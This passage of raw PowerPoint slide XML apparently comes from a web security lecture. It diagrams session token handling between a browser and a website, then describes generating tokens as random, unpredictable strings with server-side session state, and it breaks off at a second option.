          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Session Management with Session Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13315" name="Group 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770AD3CF-590E-0044-8A72-35C9FD9E66B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="1844676"/>
            <a:ext cx="1219200" cy="4343400"/>
            <a:chOff x="381000" y="2133600"/>
            <a:chExt cx="1219221" cy="4343400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56347" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A5842B-8A72-2843-9D6F-F7350EC668A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="381000" y="2133600"/>
              <a:ext cx="1219221" cy="4343400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323015" name="Text Box 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9986842B-90C6-5C41-A511-3B223DB479F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="444014" y="2178155"/>
              <a:ext cx="955727" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13316" name="Group 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C489ADF-4129-FC42-9E2D-5B00B0EDAFD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8839201" y="1828800"/>
            <a:ext cx="1219200" cy="4343400"/>
            <a:chOff x="7315200" y="2133600"/>
            <a:chExt cx="1219337" cy="4343400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56345" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F136FC7-C9F5-7D46-98AC-3411A14E32E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7315200" y="2133600"/>
              <a:ext cx="1219337" cy="4343400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323017" name="Text Box 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61CE5F4F-40A0-F140-B03B-122DE18EA281}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7422318" y="2198622"/>
              <a:ext cx="962231" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Website</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56341" name="Straight Arrow Connector 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5956819-1BE3-0F45-A3AF-C0AAF73B0DB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="2133600"/>
            <a:ext cx="5105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42" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21C4FFE7-EAB4-724E-AC6C-E6AB74EE98FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581401" y="1676400"/>
            <a:ext cx="1717137" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET /index.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56343" name="Straight Arrow Connector 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59F644D-AE21-0A4F-A948-AE737FDD3CD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3603626" y="2587625"/>
            <a:ext cx="5235575" cy="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44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C26D315-E814-6244-88B2-32B6176E57B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2281238"/>
            <a:ext cx="4224338" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set anonymous session token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D888137-7FF5-F940-B1AD-49F1DDA343C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="2951606"/>
            <a:ext cx="5105400" cy="646331"/>
            <a:chOff x="1600200" y="2951744"/>
            <a:chExt cx="5105400" cy="646195"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13331" name="Straight Arrow Connector 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{849508DA-EFE7-FA48-B058-8EA7954C8FD2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1600200" y="3299182"/>
              <a:ext cx="5105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40" name="TextBox 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3EF2122-1E09-4840-A2DE-7AEA3757F4F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="2951744"/>
              <a:ext cx="2666114" cy="646195"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>GET /opencontent.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>anonymous session token</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56335" name="Straight Arrow Connector 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3274623-0616-BD44-9260-F385F9210570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="4311650"/>
            <a:ext cx="5105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36" name="TextBox 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7864C79-10F5-D746-A688-A168D468443B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3603625" y="3983862"/>
            <a:ext cx="2568332" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST /do-login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username and password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56337" name="Straight Arrow Connector 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D35378-DC20-F249-BBD6-265E59832E53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3657600" y="5026025"/>
            <a:ext cx="5181600" cy="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38" name="TextBox 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF02C0B9-9F28-7248-80AB-0B3D34B55700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4657725" y="4795838"/>
            <a:ext cx="2824812" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set logged-in session token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56333" name="Straight Arrow Connector 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5411E2D6-D8C8-6C41-B492-25C83F8D69F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="5789614"/>
            <a:ext cx="5105400" cy="158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34" name="TextBox 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13C0027F-DD80-BF4B-A65C-0697A4C56FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="5443061"/>
            <a:ext cx="2486578" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST /checkout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>logged-in session token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rounded Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79BF5C3B-240E-904A-8520-4A2812800225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8567738" y="3890146"/>
            <a:ext cx="1719262" cy="791049"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>check </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rounded Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B00E371-BCD1-2E47-ABEF-835DE2717DA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8567738" y="5361470"/>
            <a:ext cx="1719262" cy="727504"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>validate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1545446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3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3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3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3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33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63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33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3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33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2" grpId="0"/>
      <p:bldP spid="56344" grpId="0" animBg="1"/>
      <p:bldP spid="56336" grpId="0"/>
      <p:bldP spid="56338" grpId="0" animBg="1"/>
      <p:bldP spid="56334" grpId="0"/>
      <p:bldP spid="5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A7AD5AB0-F07B-B442-B191-2384F4E4FF22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Generating Session Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11AB4A29-8E6B-2740-A051-D2D235282E61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Option #1: minimal client-side state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E31183D0-38BD-6145-988D-40117B7CD95F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069848" y="2792472"/>
            <a:ext cx="5026152" cy="3163825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>random, unpredictable string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>No data embedded in token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Server stores all data associated with the session: user id, login status, login time,  etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Potential server overhead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>With multiple sessions, lots of database lookups to retrieve session state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E55BDA5-0332-9244-ABF8-1F4E3EF05113}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Option #2: more client-side state</a:t>
